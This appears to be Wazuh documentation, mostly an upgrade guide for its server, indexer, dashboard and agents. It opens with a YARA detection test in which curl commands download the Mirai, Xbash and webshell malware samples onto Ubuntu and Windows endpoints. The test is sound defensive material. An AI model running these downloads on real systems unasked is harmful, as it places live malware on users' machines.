Run the following commands on the Ubuntu endpoint to download malware samples to the monitored /home directory:

# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" > /home/mirai
# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" > /home/xbash
# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" > /home/webshell

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Modules > Security events tab and add the rule.groups:yara filter in the search bar to query the alerts.

As seen in the image, ChatGPT provides more context about the malicious file detected by YARA. Further insight, such as the origin, attack vectors, and impact of the malicious file, can be seen in the yara.chatgpt_response field.

ChatGPT context in alert with YARA
Active Response

The image below shows an example of an alert triggered when the provided ChatGPT API key is invalid or a matched YARA rule does not contain a description.

ChatGPT context none in alert with YARA
Windows 11 endpoint

Run the following commands via PowerShell to download malware samples to the monitored C:\Users\*\Downloads directory:

> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" -o   $env:USERPROFILE\Downloads\mirai
> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" -o   $env:USERPROFILE\Downloads\xbash
> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" -o $env:USERPROFILE\Downloads\webshell

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Security events module and add the following filter in the search bar to query the alerts:

  • rule.groups:yara

As seen in the image, ChatGPT provides more context about the malicious file detected by YARA. Further insight, such as the origin, attack vectors, and impact of the malicious file, can be seen in the yara.chatgpt_response field.

ChatGPT context in alert with YARA
Active Response

The image below shows an example of an alert triggered when the provided ChatGPT API key is invalid or a matched YARA rule does not contain a description.

ChatGPT context none in alert with YARA

Upgrade guide

This guide includes instructions on how to upgrade the Wazuh central components (server, indexer, and dashboard) and the Wazuh agent.

Wazuh components compatibility

All central Wazuh components must have identical version numbers, including the patch level, for proper operation. Additionally, the Wazuh manager must always be the same version or newer than the Wazuh agents.

Note that Wazuh indexer 5.0.0 is specifically compatible with Filebeat-OSS 7.10.2.
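
As a quick illustration of these constraints, the hypothetical sketch below compares version strings the way the rules above describe; it is not a Wazuh tool, just a way to reason about compatibility before upgrading.

def parse(version: str) -> tuple:
    # "5.0.0" -> (5, 0, 0)
    return tuple(int(part) for part in version.split("."))

def central_components_compatible(*versions: str) -> bool:
    # Server, indexer, and dashboard must share the exact same version, patch level included.
    return len(set(versions)) == 1

def agent_compatible(agent_version: str, manager_version: str) -> bool:
    # The Wazuh manager must be the same version as the agent or newer.
    return parse(agent_version) <= parse(manager_version)

print(central_components_compatible("5.0.0", "5.0.0", "5.0.0"))  # True
print(agent_compatible("4.9.2", "5.0.0"))                        # True
print(agent_compatible("5.0.1", "5.0.0"))                        # False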

Upgrade the Wazuh central components

The Wazuh central components section includes instructions on how to upgrade the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. These instructions apply to both all-in-one deployments and multi-node cluster deployments.

Upgrade the Wazuh agents

You can upgrade the Wazuh agents either remotely or locally. For remote upgrades, you can use either the Wazuh manager (agent_upgrade tool) or the Wazuh API (via the Wazuh dashboard or a command-line tool). For details, refer to the remote agent upgrade section.

To perform the upgrade locally, select your operating system and follow the instructions.

Wazuh central components

This section guides you through the upgrade process of the Wazuh indexer, the Wazuh server, and the Wazuh dashboard.

  • All-in-one deployments: Execute all commands and configuration actions on the same node since all components run on a single system.

  • Multi-node cluster deployments: Run commands and apply configurations on the respective node where the component being upgraded is located.

Warning

Downgrading to version 4.11 and earlier is not possible. Since version 4.12.0, Wazuh uses a newer version of Apache Lucene.

Apache Lucene does not support downgrades, meaning once you upgrade to Wazuh 4.12.0 or later, you cannot roll back to 4.11 and earlier versions without a fresh installation of the indexer.

To avoid data loss, create an index snapshot before upgrading. For more details, refer to the OpenSearch documentation.

Note

Since Wazuh 5.0, the following Rootcheck configuration options and database files have been removed:

  • File check options: <check_files>, <rootkit_files>, and the database file rootkit_files.txt.

  • Trojan scan options: <check_trojans>, <rootkit_trojans>, and the database file rootkit_trojans.txt.

  • Policy check options: <check_unixaudit>, <check_winaudit>, <check_winapps>, <check_winmalware>, and the database files system_audit_rcl.txt, system_audit_ssh.txt, win_applications_rcl.txt, win_audit_rcl.txt, and win_malware_rcl.txt.

These functionalities overlap with, or are replaced by, the Security Configuration Assessment (SCA) and File Integrity Monitoring (FIM) capabilities. If any of these options are configured in your ossec.conf file, remove them before upgrading to avoid configuration parsing warnings.
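
If you are unsure whether any of these options remain in your configuration, a simple search of ossec.conf is enough. The sketch below is one hypothetical way to run that check in Python; it assumes the default Linux path and only prints what it finds.

# Report removed Rootcheck options that are still present in ossec.conf.
REMOVED_OPTIONS = [
    "<check_files>", "<rootkit_files>",
    "<check_trojans>", "<rootkit_trojans>",
    "<check_unixaudit>", "<check_winaudit>",
    "<check_winapps>", "<check_winmalware>",
]

with open("/var/ossec/etc/ossec.conf") as conf:
    content = conf.read()

for option in REMOVED_OPTIONS:
    if option in content:
        print(f"Remove {option} from ossec.conf before upgrading")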

Preparing the upgrade

Perform the steps below before upgrading any of the Wazuh components. If Wazuh is installed in a multi-node cluster configuration, repeat the following steps on every node.

  1. Ensure you have added the Wazuh repository to every Wazuh indexer, server, and dashboard node before proceeding to perform the upgrade actions.

    1. Import the GPG key.

      # rpm --import https://packages.wazuh.com/key/GPG-KEY-WAZUH
      
    2. Add the repository.

      • For RHEL-compatible systems version 8 and earlier, use the following command:

        # echo -e '[wazuh]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=EL-$releasever - Wazuh\nbaseurl=https://packages.wazuh.com/5.x/yum/\nprotect=1' | tee /etc/yum.repos.d/wazuh.repo
        
      • For RHEL-compatible systems version 9 and later, use the following command:

        # echo -e '[wazuh]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=EL-$releasever - Wazuh\nbaseurl=https://packages.wazuh.com/5.x/yum/\npriority=1' | tee /etc/yum.repos.d/wazuh.repo
        
  2. (Recommended) Export customizations from the Wazuh dashboard. This step helps to preserve visualizations, dashboards, and other saved objects in case there are any issues during the upgrade process.

    1. Navigate to Dashboard management > Dashboards Management > Saved objects on the Wazuh dashboard.

    2. Select which objects to export and click Export, or click Export all objects to export everything.

  3. Stop the Filebeat and Wazuh dashboard services if installed in the node:

    # systemctl stop filebeat
    # systemctl stop wazuh-dashboard
    
Upgrading the Wazuh indexer

The Wazuh indexer cluster remains operational throughout the upgrade. The rolling upgrade process allows nodes to be updated one at a time, ensuring continuous service availability and minimizing disruptions. The steps detailed in the following sections apply to both single-node and multi-node Wazuh indexer clusters.

Preparing the Wazuh indexer cluster for upgrade

Perform the following steps on any of the Wazuh indexer nodes, replacing <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD> with the values for your deployment.

  1. Back up the existing Wazuh indexer security configuration files:

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh --options "-backup /etc/wazuh-indexer/opensearch-security -icl -nhnv"
    
    Security Admin v7
    Will connect to 127.0.0.1:9200 ... done
    Connected as "CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US"
    OpenSearch Version: 2.19.2
    Contacting opensearch cluster 'opensearch' and wait for YELLOW clusterstate ...
    Clustername: wazuh-cluster
    Clusterstate: GREEN
    Number of nodes: 1
    Number of data nodes: 1
    .opendistro_security index already exists, so we do not need to create one.
    Will retrieve '/config' into /etc/wazuh-indexer/opensearch-security/config.yml
       SUCC: Configuration for 'config' stored in /etc/wazuh-indexer/opensearch-security/config.yml
    Will retrieve '/roles' into /etc/wazuh-indexer/opensearch-security/roles.yml
       SUCC: Configuration for 'roles' stored in /etc/wazuh-indexer/opensearch-security/roles.yml
    Will retrieve '/rolesmapping' into /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
       SUCC: Configuration for 'rolesmapping' stored in /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
    Will retrieve '/internalusers' into /etc/wazuh-indexer/opensearch-security/internal_users.yml
       SUCC: Configuration for 'internalusers' stored in /etc/wazuh-indexer/opensearch-security/internal_users.yml
    Will retrieve '/actiongroups' into /etc/wazuh-indexer/opensearch-security/action_groups.yml
       SUCC: Configuration for 'actiongroups' stored in /etc/wazuh-indexer/opensearch-security/action_groups.yml
    Will retrieve '/tenants' into /etc/wazuh-indexer/opensearch-security/tenants.yml
       SUCC: Configuration for 'tenants' stored in /etc/wazuh-indexer/opensearch-security/tenants.yml
    Will retrieve '/nodesdn' into /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
       SUCC: Configuration for 'nodesdn' stored in /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
    Will retrieve '/whitelist' into /etc/wazuh-indexer/opensearch-security/whitelist.yml
       SUCC: Configuration for 'whitelist' stored in /etc/wazuh-indexer/opensearch-security/whitelist.yml
    Will retrieve '/allowlist' into /etc/wazuh-indexer/opensearch-security/allowlist.yml
       SUCC: Configuration for 'allowlist' stored in /etc/wazuh-indexer/opensearch-security/allowlist.yml
    Will retrieve '/audit' into /etc/wazuh-indexer/opensearch-security/audit.yml
       SUCC: Configuration for 'audit' stored in /etc/wazuh-indexer/opensearch-security/audit.yml
    
  2. Disable shard replication to prevent shard replicas from being created while Wazuh indexer nodes are being taken offline for the upgrade.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cluster/settings"  -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "persistent": {
        "cluster.routing.allocation.enable": "primaries"
      }
    }
    '
    
    {
      "acknowledged" : true,
      "persistent" : {
        "cluster" : {
          "routing" : {
            "allocation" : {
              "enable" : "primaries"
            }
          }
        }
      },
      "transient" : {}
    }
    
  3. Perform a flush operation on the cluster to commit transaction log entries to the index.

    # curl -X POST "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_flush" -u <USERNAME> -k
    
    {
       "_shards" : {
          "total" : 19,
          "successful" : 19,
          "failed" : 0
       }
    }
    
  4. If you are running a single-node Wazuh indexer cluster, run the following command on the Wazuh manager node(s) to stop the Wazuh manager service.

    # systemctl stop wazuh-manager
    
Upgrading the Wazuh indexer nodes

Perform the following steps on each Wazuh indexer node to upgrade them. Upgrade nodes with the cluster_manager role last to maintain cluster connectivity among online nodes.

Note

You can check the role of Wazuh indexer nodes in the cluster using the following command:

# curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
  1. Stop the Wazuh indexer service.

    # systemctl stop wazuh-indexer
    
  2. Back up the /etc/wazuh-indexer/jvm.options file to preserve your custom JVM settings. Create a copy of the file using the following command:

    # cp /etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options.old
    
  3. Upgrade the Wazuh indexer to the latest version.

    # yum upgrade wazuh-indexer
    
  4. Manually reapply any custom settings to the /etc/wazuh-indexer/jvm.options file from your backup file.

  5. Restart the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    

Repeat steps 1 to 5 above on all Wazuh indexer nodes before proceeding to the post-upgrade actions.

Post-upgrade actions

Perform the following steps on any of the Wazuh indexer nodes, replacing <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD> with the values for your deployment.

  1. Run the indexer-security-init.sh script to apply the backed-up security configuration files to the upgraded Wazuh indexer:

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    
    Security Admin v7
    Will connect to 127.0.0.1:9200 ... done
    Connected as "CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US"
    OpenSearch Version: 2.19.3
    Contacting opensearch cluster 'opensearch' and wait for YELLOW clusterstate ...
    Clustername: wazuh-cluster
    Clusterstate: GREEN
    Number of nodes: 1
    Number of data nodes: 1
    .opendistro_security index already exists, so we do not need to create one.
    Populate config from /etc/wazuh-indexer/opensearch-security/
    Will update '/config' with /etc/wazuh-indexer/opensearch-security/config.yml
       SUCC: Configuration for 'config' created or updated
    Will update '/roles' with /etc/wazuh-indexer/opensearch-security/roles.yml
       SUCC: Configuration for 'roles' created or updated
    Will update '/rolesmapping' with /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
       SUCC: Configuration for 'rolesmapping' created or updated
    Will update '/internalusers' with /etc/wazuh-indexer/opensearch-security/internal_users.yml
       SUCC: Configuration for 'internalusers' created or updated
    Will update '/actiongroups' with /etc/wazuh-indexer/opensearch-security/action_groups.yml
       SUCC: Configuration for 'actiongroups' created or updated
    Will update '/tenants' with /etc/wazuh-indexer/opensearch-security/tenants.yml
       SUCC: Configuration for 'tenants' created or updated
    Will update '/nodesdn' with /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
       SUCC: Configuration for 'nodesdn' created or updated
    Will update '/whitelist' with /etc/wazuh-indexer/opensearch-security/whitelist.yml
       SUCC: Configuration for 'whitelist' created or updated
    Will update '/audit' with /etc/wazuh-indexer/opensearch-security/audit.yml
       SUCC: Configuration for 'audit' created or updated
    Will update '/allowlist' with /etc/wazuh-indexer/opensearch-security/allowlist.yml
       SUCC: Configuration for 'allowlist' created or updated
    SUCC: Expected 10 config types for node {"updated_config_types":["allowlist","tenants","rolesmapping","nodesdn","audit","roles","whitelist","actiongroups","config","internalusers"],"updated_config_size":10,"message":null} is 10 (["allowlist","tenants","rolesmapping","nodesdn","audit","roles","whitelist","actiongroups","config","internalusers"]) due to: null
    Done with success
    
  2. Check that the newly upgraded Wazuh indexer nodes are in the cluster.

    # curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
  3. Re-enable shard allocation.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cluster/settings" -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "persistent": {
        "cluster.routing.allocation.enable": "all"
      }
    }
    '
    
    {
      "acknowledged" : true,
      "persistent" : {
        "cluster" : {
          "routing" : {
            "allocation" : {
              "enable" : "all"
            }
          }
        }
      },
      "transient" : {}
    }
    
  4. Check the status of the Wazuh indexer cluster again to see if the shard allocation has finished.

    # curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
    ip         heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                                        cluster_manager name
    172.18.0.3           34          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client -               wazuh2.indexer
    172.18.0.4           21          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client *               wazuh1.indexer
    172.18.0.2           16          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client -               wazuh3.indexer
    

Note

Note that the upgrade process doesn't update plugins installed manually. Outdated plugins might cause the upgrade to fail.

  1. Run the following command on each Wazuh indexer node to list installed plugins and identify those that require an update:

    # /usr/share/wazuh-indexer/bin/opensearch-plugin list
    

    In the output, plugins that require an update will be labeled as "outdated".

  2. Remove the outdated plugins and reinstall the latest version replacing <PLUGIN_NAME> with the name of the plugin:

    # /usr/share/wazuh-indexer/bin/opensearch-plugin remove <PLUGIN_NAME>
    # /usr/share/wazuh-indexer/bin/opensearch-plugin install <PLUGIN_NAME>
    
Upgrading the Wazuh server

When upgrading a multi-node Wazuh manager cluster, run the upgrade on every node, starting with the master node to reduce server downtime. To successfully upgrade the Wazuh server, follow these steps in order:

  1. Upgrade the Wazuh manager.

  2. Configure the vulnerability detection (if required, based on the version you are upgrading from).

  3. Configure Filebeat.

Note

Upgrading from Wazuh 4.2.x or lower creates the wazuh operating system user and group to replace ossec. To avoid upgrade conflicts, make sure that the wazuh user and group are not present in your operating system.

Upgrading the Wazuh manager
  1. Upgrade the Wazuh manager to the latest version:

    # yum upgrade wazuh-manager
    

    Warning

    If the /var/ossec/etc/ossec.conf configuration file was modified, it will not be replaced by the upgrade. You will therefore have to add the settings of the new capabilities manually. More information can be found in the User manual.

  2. Run the following command on the Wazuh manager node(s) to start the Wazuh manager service if you stopped it earlier:

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
Configuring CDB lists

When upgrading from Wazuh 4.12.x or earlier, follow these steps to configure the newly added CDB lists.

  1. Edit the /var/ossec/etc/ossec.conf file and update the <ruleset> block so that it includes the CDB lists shown below.

    <ruleset>
        <!-- Default ruleset -->
        <decoder_dir>ruleset/decoders</decoder_dir>
        <rule_dir>ruleset/rules</rule_dir>
        <rule_exclude>0215-policy_rules.xml</rule_exclude>
        <list>etc/lists/audit-keys</list>
        <list>etc/lists/amazon/aws-eventnames</list>
        <list>etc/lists/security-eventchannel</list>
        <list>etc/lists/malicious-ioc/malware-hashes</list>
        <list>etc/lists/malicious-ioc/malicious-ip</list>
        <list>etc/lists/malicious-ioc/malicious-domains</list>
        <!-- User-defined ruleset -->
        <decoder_dir>etc/decoders</decoder_dir>
        <rule_dir>etc/rules</rule_dir>
    </ruleset>
    
  2. Restart the Wazuh manager to apply the configuration changes

    # systemctl restart wazuh-manager
    
Configuring the vulnerability detection and indexer connector

The Wazuh Inventory Harvester and Vulnerability Detection modules rely on the indexer connector setting to forward system inventory data and detected vulnerabilities to the Wazuh indexer.

If upgrading from version 4.8.x or later, skip the vulnerability detection and indexer connector configurations and proceed to Configuring Filebeat. No action is needed as the vulnerability detection and indexer connector blocks are already configured.

When upgrading from Wazuh version 4.7.x or earlier, follow these steps to configure the vulnerability detection and indexer connector blocks.

  1. Update the configuration file

    Edit the /var/ossec/etc/ossec.conf file to include the new <vulnerability-detection> block. Remove the old <vulnerability-detector> block if it exists.

    The updated configuration enables the Wazuh Vulnerability Detection module to index vulnerabilities and alerts, with the vulnerability feed refreshing every 60 minutes. Add the following block to the configuration file:

    <vulnerability-detection>
       <enabled>yes</enabled>
       <index-status>yes</index-status>
       <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
  2. Configure the indexer block

    1. Ensure the <indexer> block contains the details of your Wazuh indexer host. During the upgrade, a default <indexer> configuration is added under <ossec_config> if none exists in /var/ossec/etc/ossec.conf. By default, the configuration includes one host with the IP address 0.0.0.0:

      <indexer>
         <enabled>yes</enabled>
         <hosts>
            <host>https://0.0.0.0:9200</host>
         </hosts>
         <ssl>
            <certificate_authorities>
               <ca>/etc/filebeat/certs/root-ca.pem</ca>
            </certificate_authorities>
            <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
            <key>/etc/filebeat/certs/filebeat-key.pem</key>
         </ssl>
      </indexer>
      

      Replace 0.0.0.0 with the IP address or hostname of your Wazuh indexer node. You can find this value in the Filebeat configuration file at /etc/filebeat/filebeat.yml. Ensure that the <certificate> and <key> names match the files located in /etc/filebeat/certs/.

    2. If using a Wazuh indexer cluster, add a <host> entry in the Wazuh manager /var/ossec/etc/ossec.conf file for each node in the cluster. For example, for a two-node configuration:

      <hosts>
         <host>https://10.0.0.1:9200</host>
         <host>https://10.0.0.2:9200</host>
      </hosts>
      

      The Wazuh server will prioritize reporting to the first indexer node in the list and switch to the next available node if it becomes unavailable. A simplified sketch of this failover order follows these configuration steps.

  3. Store Wazuh indexer credentials

    Save the Wazuh indexer username and password into the Wazuh manager keystore using the wazuh-keystore tool:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    If you have forgotten your Wazuh indexer password, refer to the password management guide to reset it.

  4. Restart the Wazuh manager to apply the configuration changes

    # systemctl restart wazuh-manager
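
As described in the indexer block configuration above, the Wazuh server reports to the first reachable host in the <hosts> list. The sketch below is a simplified, hypothetical illustration of that failover order using Python's requests library; it is not how the indexer connector is implemented, and the addresses and credentials are placeholders.

import requests

# Hosts listed in the same order as the <host> entries in ossec.conf (placeholder values).
HOSTS = ["https://10.0.0.1:9200", "https://10.0.0.2:9200"]

def first_available_host(hosts, auth, ca_path):
    # Return the first host that answers, mimicking the priority order described above.
    for host in hosts:
        try:
            response = requests.get(host, auth=auth, verify=ca_path, timeout=5)
            if response.ok:
                return host
        except requests.RequestException:
            continue  # Try the next host in the list.
    return None

creds = ("<INDEXER_USERNAME>", "<INDEXER_PASSWORD>")
print(first_available_host(HOSTS, creds, "/etc/filebeat/certs/root-ca.pem"))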
    
Configuring Filebeat

When upgrading Wazuh, you must also update the Wazuh Filebeat module and the alerts template to ensure compatibility with the latest Wazuh indexer version. Follow these steps to configure Filebeat properly:

  1. Download the Wazuh module for Filebeat:

    # curl -s https://packages.wazuh.com/5.x/filebeat/wazuh-filebeat-0.5.tar.gz | sudo tar -xvz -C /usr/share/filebeat/module
    
  2. Download the alerts template:

    # curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/v5.0.0/extensions/elasticsearch/7.x/wazuh-template.json
    # chmod go+r /etc/filebeat/wazuh-template.json
    
  3. Backup the /etc/filebeat/filebeat.yml file to preserve your custom Filebeat configuration settings. Create a copy of the file using the following command:

    # cp /etc/filebeat/filebeat.yml  /etc/filebeat/filebeat.yml.old
    
  4. Upgrade Filebeat to the latest version:

    # yum upgrade filebeat
    
  5. Restore your custom Filebeat configuration settings:

    # cp /etc/filebeat/filebeat.yml.old  /etc/filebeat/filebeat.yml
    
  6. Restart Filebeat:

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  7. Upload the new Wazuh template and pipelines for Filebeat:

    # filebeat setup --pipelines
    # filebeat setup --index-management -E output.logstash.enabled=false
    
  8. If you are upgrading from Wazuh versions v4.8.x or v4.9.x, manually update the wazuh-states-vulnerabilities-* mappings using the following command. Replace <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD> with the values applicable to your deployment.

    Skip this step if upgrading from other versions.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/wazuh-states-vulnerabilities-*/_mapping"  -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "properties": {
        "vulnerability": {
          "properties": {
            "under_evaluation": {
              "type": "boolean"
            },
            "scanner": {
              "properties": {
                "source": {
                  "type": "keyword",
                  "ignore_above": 1024
                }
              }
            }
          }
        }
      }
    }
    '
    
Upgrading the Wazuh dashboard

Back up the /etc/wazuh-dashboard/opensearch_dashboards.yml file to preserve your settings. For example, create a copy of the file using the following command:

# cp /etc/wazuh-dashboard/opensearch_dashboards.yml /etc/wazuh-dashboard/opensearch_dashboards.yml.old
  1. Upgrade the Wazuh dashboard.

    # yum upgrade wazuh-dashboard
    
  2. Manually reapply any configuration changes to the /etc/wazuh-dashboard/opensearch_dashboards.yml file. Ensure that the values of server.ssl.key and server.ssl.certificate match the files located in /etc/wazuh-dashboard/certs/.

  3. Ensure the value of uiSettings.overrides.defaultRoute in the /etc/wazuh-dashboard/opensearch_dashboards.yml file is set to /app/wz-home as shown below:

    uiSettings.overrides.defaultRoute: /app/wz-home
    
  4. Restart the Wazuh dashboard:

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    

    You can now access the Wazuh dashboard via: https://<DASHBOARD_IP_ADDRESS>/app/wz-home.

  5. Import the saved customizations exported while preparing the upgrade.

    1. Navigate to Dashboard management > Dashboards Management > Saved objects on the Wazuh dashboard.

    2. Click Import, select the exported .ndjson file, and click Import.

Note

Note that the upgrade process doesn't update plugins installed manually. Outdated plugins might cause the upgrade to fail.

  1. Run the following command on the Wazuh dashboard server to list installed plugins and identify those that require an update:

    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin list
    

    In the output, plugins that require an update will be labeled as "outdated".

  2. Remove the outdated plugins and reinstall the latest version replacing <PLUGIN_NAME> with the name of the plugin:

    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin remove <PLUGIN_NAME>
    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin install <PLUGIN_NAME>
    
Next steps

The Wazuh server, indexer, and dashboard are now successfully upgraded. You can verify the versions by running the following commands on the node(s) where the central components are installed:

# yum list installed wazuh-indexer
# yum list installed wazuh-manager
# yum list installed wazuh-dashboard

Next, upgrade the Wazuh agents by following the instructions in Upgrading the Wazuh agent.

Wazuh agent

The following sections include instructions to upgrade the Wazuh agent to the latest available version. It is possible to upgrade the Wazuh agents either remotely from the Wazuh manager or locally.

For remote upgrades, you can use either the Wazuh manager (agent_upgrade tool) or the Wazuh API (via the Wazuh dashboard or a command-line tool). For details, refer to the Remote agent upgrade section.

To perform the upgrade locally, select your operating system and follow the instructions.

Upgrading Wazuh agents on Linux endpoints

Select your package manager and follow the instructions to upgrade the Wazuh agent locally.

Note

You need root user privileges to run all the commands described below.

  1. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  2. Add the Wazuh repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  3. Upgrade the Wazuh agent to the latest version.

    # apt-get update
    # apt-get install wazuh-agent
    
  4. We recommend disabling the Wazuh repository to avoid undesired upgrades and compatibility issues, since the Wazuh agent must always be the same version as or older than the Wazuh manager. Skip this step if the package is set to a hold state.

    # sed -i "s/^deb/#deb/" /etc/apt/sources.list.d/wazuh.list
    # apt-get update
    

Note

For Debian 7, 8, and Ubuntu 14 systems, import the GPG key and add the Wazuh repository (steps 1 and 2) using the following commands.

# apt-get install gnupg apt-transport-https
# curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
# echo "deb https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
Upgrading Wazuh agents on Windows endpoints

Follow these steps to upgrade Wazuh agents locally on Windows endpoints.

Note

You need administrator privileges to upgrade the agent.

  1. Download the latest Windows installer.

  2. Run the Windows installer by using the command line interface (CLI) or the graphical user interface (GUI).

    To upgrade the Wazuh agent from the command line, run the installer using Windows PowerShell or the command prompt. The /q argument is used for unattended installations.

    # .\wazuh-agent-5.0.0-1.msi /q
    
Upgrading Wazuh agents on macOS endpoints

Follow these steps to upgrade Wazuh agents locally on macOS endpoints.

Note

You need administrator privileges to upgrade the agent.

  1. Download the latest macOS installer:

  2. Run the macOS installer by using the command line interface (CLI) or the graphical user interface (GUI).

    To upgrade the Wazuh agent by using the command line, select your architecture, and run the installer:

    # installer -pkg wazuh-agent-5.0.0-1.intel64.pkg -target /
    

Troubleshooting

This section contains common issues that might occur when upgrading the Wazuh central components and provides steps to resolve them.

Wazuh-DB backup restoration

Wazuh performs automatic backups of the global.db database by default. These snapshots can be used to recover critical information such as agent keys, agent synchronization information, and FIM event data, among others. Wazuh-DB restores the last available backup in case of failure during the upgrade. If this process also fails, you must perform the restoration manually.

Manual restoration process
  1. Stop the Wazuh manager.

    # systemctl stop wazuh-manager
    
  2. Locate the backup to restore. It is stored in /var/ossec/backup/db/ with a name format similar to global.db-backup-TIMESTAMP-pre_upgrade.gz. A short sketch for finding the newest pre_upgrade snapshot follows these steps.

    Note

    This process is valid for all the backups in the folder. Snapshot names containing the special tag pre_upgrade were created right before upgrading the Wazuh server. Any other snapshot is a periodic backup created according to the backup setting.

  3. Decompress the backup file. Always use the -k flag to preserve the original file:

    # gzip -dk WAZUH_HOME/backup/db/global.db-backup-TIMESTAMP-pre_upgrade.gz
    
  4. Remove the current global.db database and move the backup to the right location:

    # rm  WAZUH_HOME/queue/db/global.db
    # mv  WAZUH_HOME/backup/db/global.db-backup-TIMESTAMP-pre_upgrade WAZUH_HOME/queue/db/global.db
    
  5. Start the Wazuh manager.

    # systemctl start wazuh-manager
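
If several snapshots have accumulated in /var/ossec/backup/db/, the hypothetical sketch below picks the most recent pre_upgrade backup; it only prints the path, and the restoration itself still follows the steps above.

from pathlib import Path

# Default backup directory on the Wazuh manager (WAZUH_HOME is /var/ossec by default).
backup_dir = Path("/var/ossec/backup/db")

# Snapshots tagged pre_upgrade were created right before the Wazuh server upgrade.
candidates = list(backup_dir.glob("global.db-backup-*-pre_upgrade.gz"))

if candidates:
    newest = max(candidates, key=lambda path: path.stat().st_mtime)
    print(f"Most recent pre-upgrade backup: {newest}")
else:
    print(f"No pre-upgrade backup found in {backup_dir}")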
    
Wazuh dashboard server is not ready yet

This message typically appears right after starting or restarting the Wazuh dashboard. However, it may also indicate one of the following issues:

  • The Wazuh dashboard service is encountering an error and repeatedly restarting.

  • The Wazuh dashboard cannot communicate with the Wazuh indexer.

  • The Wazuh indexer service is not running or has encountered an error.

Steps to diagnose and fix the issue
  1. Ensure the Wazuh dashboard service is active. Run the following command on the Wazuh dashboard node to check the status:

    # systemctl status wazuh-dashboard
    
  2. Check the Wazuh dashboard logs for errors. Run the following command on the Wazuh dashboard node:

    # journalctl -u wazuh-dashboard | grep -i -E "error|warn"
    
  3. Ensure the Wazuh dashboard is correctly configured to communicate with the Wazuh indexer. Open the dashboard /etc/wazuh-dashboard/opensearch_dashboards.yml file and verify the Wazuh indexer IP address configured in the opensearch.hosts field:

    opensearch.hosts: https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
  4. Check the connectivity between the Wazuh dashboard and the Wazuh indexer. Replace <WAZUH_INDEXER_IP_ADDRESS> and run the following command on the Wazuh dashboard node:

    # curl -v telnet://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
